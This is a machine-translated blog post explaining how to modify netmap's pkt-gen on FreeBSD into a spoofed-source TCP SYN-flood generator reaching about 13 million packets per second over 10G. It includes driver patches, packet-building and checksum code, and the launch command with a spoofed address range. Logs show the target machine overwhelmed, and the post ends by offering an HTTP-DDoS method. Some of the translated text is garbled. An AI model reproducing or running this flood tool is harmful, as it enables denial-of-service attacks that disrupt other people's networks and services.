📜 ⬆️ ⬇️

14 mpps SYN floods or 14 V load fork

Something struck me to write notes lately, so while the enthusiasm has not slept, I distribute debts.
A year ago, I came to Habr with the article " TCP (syn-flood) -netmap-generator with a capacity of 1.5 mpps ", after which many people wrote and even called to describe the creation of the same "plug" with spoofing at the maximum capacity of 10GB network. I promised everyone, but my hands did not reach everything.
Someone will say that this is a guide for hackers, but after all, a pig of dirt will find, and those who need this tool for reliable purposes can be left with nothing.

image

Therefore we will start.

As usual, first about what we work on:
# uname -orp FreeBSD 10.0-STABLE amd64 # pciconf -lv | grep -i device | grep -i network device = '82599EB 10-Gigabit SFI/SFP+ Network Connection' 

')
So, we have two computers at the household level, a pair of Intel's 82599EB and 10G SFP

Let's start with the network cards. Network equipment manufacturers hate it when someone uses their adapters, but takes third-party SFPs. And, as a rule, “out of the box” the network card of one brand will not work with SFP of other firms. There are two ways to solve it:
- alter the SFP-module for the desired brand;
- fix driver.
For the first option you need a programmer. I don’t have my own, but I don’t feel a desire to drive 150km to a friend. Therefore, our option is to edit the source. We need to make changes to ee /usr/src/sys/dev/ixgbe/ixgbe.c
Older versions of the glam need to change
 if (!(enforce_sfp & IXGBE_DEVICE_CAPS_ALLOW_ANY_SFP) && 

on
 enforce_sfp |= IXGBE_DEVICE_CAPS_ALLOW_ANY_SFP; if (!(enforce_sfp & IXGBE_DEVICE_CAPS_ALLOW_ANY_SFP) && 

But then Intel realized that it was not worth fighting windmills and entered the parameter allow_unsupported_sfp
 # grep -rni "allow_unsupported_sfp" *.c ixgbe.c:322:static int allow_unsupported_sfp = FALSE; 

Change it to TRUE. Add immediately to the core:
 # grep netmap /usr/src/sys/amd64/conf/20140523 device netmap 

And we rebuild. The system meets us:
WARNING: Intel® Network Connections are quality tested using Intel® Ethernet Optics. Module or the adapter. Unested modules.

The goal was achieved, the SFP-scale was wound up and the Baitics ran in many ways.
Get the netmap source
 git clone https://code.google.com/p/netmap/ 

And take netmap / examples / pkt-gen.c as a basis
We create the structure of our package:
 struct pkt { struct virt_header vh; struct ether_header eh; struct ip ip; struct tcphdr tcp; uint8_t body[2048]; // XXX hardwired } __attribute__((__packed__)); 


specify the protocol
  ip->ip_p = IPPROTO_TCP; 


and fill the structure
  tcp = &pkt->tcp; tcp->th_sport = htons(targ->g->src_ip.port0); tcp->th_dport = htons(targ->g->dst_ip.port0); //tcp->th_ulen = htons(paylen); /* Magic: taken from sbin/dhclient/packet.c */ tcp->th_seq = ntohl(rand()); // Contains the sequence number. tcp->th_ack = rand(); // Contains the acknowledgement number. tcp->th_x2 = 0; // Unused. tcp->th_off = 5; // Contains the data offset. tcp->th_flags = TH_SYN; // Contains one of the following values: /* Flag Value Description TH_FIN 0x01 Indicates that the transmission is finishing. TH_SYN 0x02 Indicates that sequence numbers are being synchronized. TH_RST 0x04 Indicates that the connection is being reset. TH_PUSH 0x08 Indicataes that data is being pushed to the application level. TH_ACK 0x10 Indicates that the acknowledge field is valid. TH_URG 0x20 Indicates that urgent data is present. */ tcp->th_win = htons(512); // Contains the window size. tcp->th_sum = 0; // Contains the checksum. tcp->th_urp = 0; // Contains the urgent pointer. 


Essentially, that's all, but we need perfect-syn, so we consider the checksum of the package being sent.
 int tcp_csum(struct ip *ip, struct tcphdr * const tcp) { u_int32_t sum = 0; int tcp_len = 0; /* Calculate total length of the TCP segment */ tcp_len = (u_int16_t) ntohs(ip->ip_len) - (ip->ip_hl << 2); /* Do pseudo-header first */ sum = sum_w((u_int16_t*)&ip->ip_src, 4); sum += (u_int16_t) IPPROTO_TCP; sum += (u_int16_t) tcp_len; /* Sum up tcp part */ sum += sum_w((u_int16_t*) tcp, tcp_len >> 1); if (tcp_len & 1) sum += (u_int16_t)(((u_char *) tcp)[tcp_len - 1] << 8); /* Flip it & stick it */ sum = (sum >> 16) + (sum & 0xFFFF); sum += (sum >> 16); return htons(~sum); } 

Now that's it.
Compile. We explode.

 pkt-gen -f tx -i netmap:ix0 -s 128.0.0.1-223.255.255.254 -d 10.90.90.55 -l 60 224.387037 main [1654] interface is netmap:ix0 224.387098 extract_ip_range [277] range is 128.0.0.1:0 to 223.255.255.254:0 224.387103 extract_ip_range [277] range is 10.90.90.55:0 to 10.90.90.55:0 ifname [netmap:ix0] 224.446848 main [1837] mapped 334980KB at 0x8019ff000 Sending on netmap:ix0: 8 queues, 1 threads and 1 cpus. 128.0.0.1 -> 10.90.90.55 (00:00:00:00:00:00 -> ff:ff:ff:ff:ff:ff) 224.446868 main [1893] --- SPECIAL OPTIONS: copy 224.446870 main [1915] Sending 512 packets every 0.000000000 s 224.446872 main [1917] Wait 2 secs for phy reset 226.462882 main [1919] Ready... ifname [netmap:ix0] 226.462926 nm_open [461] overriding ifname ix0 ringid 0x0 flags 0x1 226.462993 sender_body [1026] start 227.526363 main_thread [1451] 11284469 pps (11999724 pkts in 1063384 usec) 228.589297 main_thread [1451] 11369243 pps (12084766 pkts in 1062935 usec) 229.652296 main_thread [1451] 12401300 pps (13119571 pkts in 1062999 usec) 230.672799 main_thread [1451] 13262006 pps (13492911 pkts in 1020503 usec) 231.736296 main_thread [1451] 13304686 pps (13022500 pkts in 1063497 usec) 


We look at the "quality" of received packets:
 # tcpdump -vvv -n 11:39:54.349362 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46) 129.115.75.162.0 > 10.90.90.55.0: Flags [S], cksum 0xcd54 (correct), seq 1091106137:1091106143, win 512, length 6 11:39:54.349364 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46) 129.115.153.57.0 > 10.90.90.55.0: Flags [S], cksum 0x9755 (correct), seq 286688948:286688954, win 512, length 6 11:39:54.349365 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46) 129.115.185.75.0 > 10.90.90.55.0: Flags [S], cksum 0xf668 (correct), seq 213892719:213892725, win 512, length 6 11:39:54.349366 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46) 129.115.75.81.0 > 10.90.90.55.0: Flags [S], cksum 0x9e6c (correct), seq 337979969:337979975, win 512, length 6 11:39:54.349367 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46) 129.115.151.163.0 > 10.90.90.55.0: Flags [S], cksum 0x15a5 (correct), seq 224623736:224623742, win 512, length 6 11:39:54.349368 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46) 129.115.183.209.0 > 10.90.90.55.0: Flags [S], cksum 0xd87a (correct), seq 426044579:426044585, win 512, length 6 


Accepted machine, of course, disposed of in the trash:
 last pid: 57199; load averages: 1.90, 0.74, 0.38 up 20+19:01:42 11:42:41 134 processes: 12 running, 95 sleeping, 27 waiting CPU 0: 0.0% user, 0.0% nice, 52.9% system, 45.1% interrupt, 2.0% idle CPU 1: 0.0% user, 0.0% nice, 43.9% system, 53.3% interrupt, 2.7% idle CPU 2: 0.0% user, 0.0% nice, 48.6% system, 51.0% interrupt, 0.4% idle CPU 3: 0.0% user, 0.0% nice, 47.5% system, 51.8% interrupt, 0.8% idle Mem: 2624K Active, 185M Inact, 299M Wired, 417M Buf, 3473M Free Swap: 3978M Total, 3978M Free PID USERNAME PRI NICE SIZE RES STATE C TIME CPU COMMAND 12 root -92 - 0K 480K CPU1 1 0:52 48.49% intr{irq257: ix0:que } 12 root -92 - 0K 480K CPU0 0 0:57 48.29% intr{irq256: ix0:que } 12 root -92 - 0K 480K RUN 2 0:51 47.75% intr{irq258: ix0:que } 12 root -92 - 0K 480K WAIT 3 0:51 47.56% intr{irq259: ix0:que } 0 root -92 0 0K 336K CPU0 0 0:57 46.29% kernel{ix0 que} 0 root -92 0 0K 336K RUN 2 0:47 45.46% kernel{ix0 que} 0 root -92 0 0K 336K CPU2 2 0:47 44.97% kernel{ix0 que} 0 root -92 0 0K 336K CPU1 1 0:47 44.87% kernel{ix0 que} 11 root 155 ki31 0K 64K RUN 3 498.8H 6.69% idle{idle: cpu3} 

And, of course, she could not handle all that flies to her. Let's try to accept this traffic using non-metric means.
 ./pkt-gen -f rx -i ix0 577.317054 main [1624] interface is ix0 577.317135 extract_ip_range [275] range is 10.0.0.1:0 to 10.0.0.1:0 577.317141 extract_ip_range [275] range is 10.1.0.1:0 to 10.1.0.1:0 577.636329 main [1807] mapped 334980KB at 0x8019ff000 Receiving from netmap:ix0: 4 queues, 1 threads and 1 cpus. 577.636386 main [1887] Wait 2 secs for phy reset 579.645114 main [1889] Ready... 579.645186 nm_open [457] overriding ifname ix0 ringid 0x0 flags 0x1 580.647065 main_thread [1421] 13319133 pps (13339428 pkts in 1001793 usec) 581.649065 main_thread [1421] 13496900 pps (13519928 pkts in 1002003 usec) 582.651054 main_thread [1421] 13386463 pps (13409111 pkts in 1001989 usec) 583.652280 main_thread [1421] 13309552 pps (13323384 pkts in 1001223 usec) Received 55348748 packets, in 4.27 seconds. Speed: 13.37 Mpps 

So much better.
Along the way, I remind you that when starting the application, netmap disconnects the adapter from the network stack, i.e. When experimenting on a remote machine, you always need to have a 2nd communication channel.
About netmap'e on this all. But there is still a small survey of similar subjects. I am often asked whether it is possible to organize HTTP-DDoS using just one computer. The answer is "Yes, it is possible and it is not difficult." But is it necessary to tell how?

Source: https://habr.com/ru/post/229733/


All Articles